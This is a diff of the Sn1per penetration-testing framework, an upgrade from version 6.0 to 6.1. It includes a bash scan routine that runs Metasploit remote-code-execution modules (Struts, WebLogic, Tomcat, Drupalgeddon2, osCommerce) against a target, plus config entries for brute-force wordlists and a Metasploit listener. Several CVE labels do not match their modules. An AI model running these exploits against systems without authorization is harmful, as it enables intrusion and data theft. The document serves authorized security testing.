echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
fi
source modes/osint_stage_2.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
if [ "$LOOT" = "1" ]; then
loot
fi
exit
fi
fi

36
pro/notepad.html Normal file
View File

@ -0,0 +1,36 @@
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Notepad App</title>
<meta charset="utf-8">
<!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<style>
html,body{background:#FCFCFC;color:#444;height:100%;width:100%;margin:0;padding:0;overflow:hidden}
#notepad{height:100%;width:100%;padding:1%;font-size:12px;line-height:100%;font-family:Menlo,Monaco,Consolas,"Courier New",monospace;box-sizing:border-box}
::selection{background:#7D7}
::-moz-selection{background:#7D7}
</style>
</head>
<body>
<textarea placeholder="Type here, see it here..." id="notepad">
<!--
you could do any element w/ contentEditable, but that doesn't fire onchange
-->
</textarea>
<script>
/* localstorage polyfill from https://gist.github.com/350433 */
("undefined"==typeof window.localStorage||"undefined"==typeof window.sessionStorage)&&function(){function e(f){function e(a){var b;b=new Date;b.setTime(b.getTime()+31536E6);document.cookie="localStorage="+a+("; expires="+b.toGMTString())+"; path=/"}function g(a){a=JSON.stringify(a);"session"==f?window.name=a:e(a)}var d=function(){var a;if("session"==f)a=window.name;else a:{a=document.cookie.split(";");var b,c;for(b=0;b<a.length;b++){for(c=a[b];" "==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf("localStorage=")){a=
c.substring(13,c.length);break a}}a=null}return a?JSON.parse(a):{}}();return{length:0,clear:function(){d={};this.length=0;"session"==f?window.name="":e("")},getItem:function(a){return void 0===d[a]?null:d[a]},key:function(a){var b=0,c;for(c in d){if(b==a)return c;b++}return null},removeItem:function(a){delete d[a];this.length--;g(d)},setItem:function(a,b){d[a]=b+"";this.length++;g(d)}}}if("undefined"==typeof window.localStorage)window.localStorage=new e("local");if("undefined"==typeof window.sessionStorage)window.sessionStorage=
new e("session")}();
/* the code */
var n = document.getElementById("notepad");
/* save */
var s = function(){localStorage.setItem("notepad", n.value);}
/* retrieve (only on page load) */
if(window.localStorage){ n.value = localStorage.getItem("notepad");}
/* autosave onchange and every 500ms and when you close the window */
n.onchange = s();
setInterval( s, 500);
window.onunload = s();
</script>
</body></html>

87
sniper
View File

@ -1,24 +1,25 @@
#!/bin/bash
# + -- --=[Sn1per by @xer0dayz
# + -- --=[Sn1per Community Edition by @xer0dayz
# + -- --=[https://xerosecurity.com
#
VER="6.0"
VER="6.1"
INSTALL_DIR="/usr/share/sniper"
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
SNIPER_PRO=$INSTALL_DIR/pro.sh
# LOAD SNIPER CONFIGURATION FILE
if [ -f ~/.sniper.conf ]; then
source ~/.sniper.conf
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
else
source $INSTALL_DIR/sniper.conf
echo -e "$OKBLUE[*] Loaded configuration file from $INSTALL_DIR/sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null
source ~/.sniper.conf
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
# REMOVE HOST FROM WORKSPACE sed -i "/www.test.com/d" domains/targets-all-sorted.txt domains/domains-all-sorted.txt domains/targets.txt
function help {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
@ -102,7 +103,7 @@ function logo {
}
function sniper_status {
watch -n 1 -c 'ps -ef | egrep "hydra|ruby|python|dirsearch|amass|nmap|metasploit|curl|wget" && echo "NETWORK CONNECTIONS..." && netstat -an | egrep "TIME_WAIT|EST"'
watch -n 1 -c 'ps -ef | egrep "hydra|ruby|python|dirsearch|amass|nmap|metasploit|curl|wget|nikto" && echo "NETWORK CONNECTIONS..." && netstat -an | egrep "TIME_WAIT|EST"'
}
function check_online {
@ -121,7 +122,7 @@ function check_online {
function check_update {
if [ "$ENABLE_AUTO_UPDATES" == "1" ] && [ "$ONLINE" == "1" ]; then
LATEST_VER=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ "$LATEST_VER" != "$VER" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper -u\" $RESET"
fi
@ -131,10 +132,10 @@ function check_update {
function update {
logo
echo -e "$OKBLUE[*] Checking for updates...[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [ "$ONLINE" = "0" ]; then
if [ "$ONLINE" == "0" ]; then
echo "You will need to download the latest release manually at https://github.com/1N3/Sn1per/"
else
LATEST_VER=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [ "$LATEST_VER" != "$VER" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
read ans
@ -207,6 +208,10 @@ case $key in
REIMPORT="1"
shift # past argument
;;
-ria|--reimportall)
REIMPORT_ALL="1"
shift # past argument
;;
-rl|--reload)
RELOAD="1"
shift # past argument
@ -231,6 +236,11 @@ case $key in
ls -l $INSTALL_DIR/loot/workspace/
echo ""
echo "cd /usr/share/sniper/loot/workspace/"
SNIPER_PRO=$INSTALL_DIR/pro.sh
if [ -f $SNIPER_PRO ]; then
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
$BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null &
fi
exit
shift
;;
@ -261,8 +271,6 @@ if [ -z "$TARGET" ] && [ -z "$WORKSPACE" ]; then
exit
fi
LOOT_DIR="/usr/share/sniper/loot/$TARGET"
cd $INSTALL_DIR
function init {
@ -277,9 +285,8 @@ function init {
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/osint 2> /dev/null
mkdir $LOOT_DIR/credentials 2> /dev/null
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
mkdir $LOOT_DIR/exploits 2> /dev/null
mkdir $LOOT_DIR/web 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
@ -302,9 +309,9 @@ function init {
if [ "$RECON" == "1" ]; then
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
fi
}
# REMOVE HOST FROM WORKSPACE sed -i "/www.test.com/d" domains/targets-all-sorted.txt domains/domains-all-sorted.txt domains/targets.txt
function loot {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
@ -329,39 +336,58 @@ function loot {
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" | tee $LOOT_DIR/notes/msf-$WORKSPACE.txt
fi
echo -e "$OKORANGE + -- --=[Current reports...$RESET"
ls -lh $LOOT_DIR/output/*.txt 2> /dev/null > /dev/null
echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
cd ./output
echo -en "$OKGREEN[$OKBLUE"
for a in `ls sniper-*.txt 2>/dev/null`;
#for a in `sort -u $LOOT_DIR/scans/updated.txt`;
do
# TXT OUTPUT
#cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
# HTML OUTPUT
cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
# PDF OUTPUT
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
echo -n '|'
done
echo -en "$OKGREEN]$RESET"
echo ""
cd ..
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
cd $LOOT_DIR/screenshots/
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
cd $LOOT_DIR
SNIPER_PRO=$INSTALL_DIR/pro.sh
if [ -f $SNIPER_PRO ]; then
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
source $INSTALL_DIR/pro.sh
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
$BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET"
read ANS
if [ "$ANS" == "y" ]; then
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
source $INSTALL_DIR/pro.sh
$BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
# DISABLED FOR V7 ONLY!
#echo -e "$OKORANGE + -- --=[Do you want to load all updated host reports (y or n)? $RESET"
#cat $UPDATED_TARGETS 2> /dev/null
#read ANS2
#if [ "$ANS2" == "y" ]; then
#
# for a in `cat $UPDATED_TARGETS`; do
# $BROWSER "$LOOT_DIR/reports/sniper-$a.html" 2> /dev/null > /dev/null &
# done
# rm -f $UPDATED_TARGETS 2> /dev/null
# touch $UPDATED_TARGETS 2> /dev/null
#fi
else
echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET"
fi
else
echo -e "$OKRED + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. $RESET"
$BROWSER https://xerosecurity.com 2> /dev/null > /dev/null &
@ -376,6 +402,14 @@ if [ "$REIMPORT" = "1" ]; then
fi
fi
if [ "$REIMPORT_ALL" = "1" ]; then
if [ ! -z "$WORKSPACE_DIR" ]; then
sort -u $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt > $WORKSPACE_DIR/scans/updated.txt
loot
exit
fi
fi
if [ "$RELOAD" = "1" ]; then
if [ ! -z "$WORKSPACE_DIR" ]; then
$BROWSER $WORKSPACE_DIR/sniper-report.html 2> /dev/null > /dev/null &
@ -386,6 +420,7 @@ fi
if [[ ${TARGET:0:1} =~ $REGEX ]];
then
SCAN_TYPE="IP"
else
SCAN_TYPE="DOMAIN"
fi

View File

@ -1,34 +1,7 @@
INSTALL_DIR="/usr/share/sniper"
SNIPER_PRO=$INSTALL_DIR/pro.sh
PLUGINS_DIR="$INSTALL_DIR/plugins"
# DEFAULT BROWSER
BROWSER="firefox"
WEB_BRUTE_FAST="$INSTALL_DIR/wordlists/toplist-fast-sorted.txt"
WEB_BRUTE_QUICK="$INSTALL_DIR/wordlists/toplist-quick-sorted.txt"
WEB_BRUTE_TOPLIST="$INSTALL_DIR/wordlists/toplist-sorted.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/toplist-sorted.txt"
WEB_BRUTE_INSANE="$INSTALL_DIR/wordlists/toplist-sorted.txt"
DOMAINS_DEFAULT="$PLUGINS_DIR/dnscan/subdomains-10000.txt"
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-insane.txt"
USER_FILE="$PLUGIN_DIR/brutex/wordlists/simple-users.txt"
PASS_FILE="$PLUGIN_DIR/wordlists/password.lst"
DNS_FILE="$PLUGIN_DIR/brutex/wordlists/namelist.txt"
# TOOL DIRECTORIES
THEHARVESTER="/usr/share/theharvester/theharvester.py"
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
DNSDICT6="$INSTALL_DIR/bin/dnsdict6"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
# PORT SCAN CONFIGURATIONS
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
THREADS="30"
# COLORS
OKBLUE='\033[94m'
OKRED='\033[91m'
@ -38,6 +11,7 @@ RESET='\e[0m'
REGEX='^[0-9]+$'
# DEFAULT SETTINGS
VERBOSE="0"
AUTOBRUTE="0"
FULLNMAPSCAN="0"
OSINT="0"
@ -48,15 +22,93 @@ LOOT="1"
METASPLOIT_IMPORT="0"
SNIPER_PRO_CONSOLE_OUTPUT="0"
# PLUGINS
# DEFAULT BROWSER
BROWSER="firefox"
# BURP 2.0 SCANNER CONFIG
BURP_HOST="127.0.0.1"
BURP_PORT="1337"
# METASPLOIT SCANNER CONFIG
MSF_LHOST="127.0.0.1"
MSF_LPORT="4444"
# WEB BRUTE FORCE WORDLISTS
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
# DOMAIN WORDLISTS
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
# DEFAULT USER/PASS WORDLISTS
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
# TOOL DIRECTORIES
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
# PORT SCAN CONFIGURATIONS
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
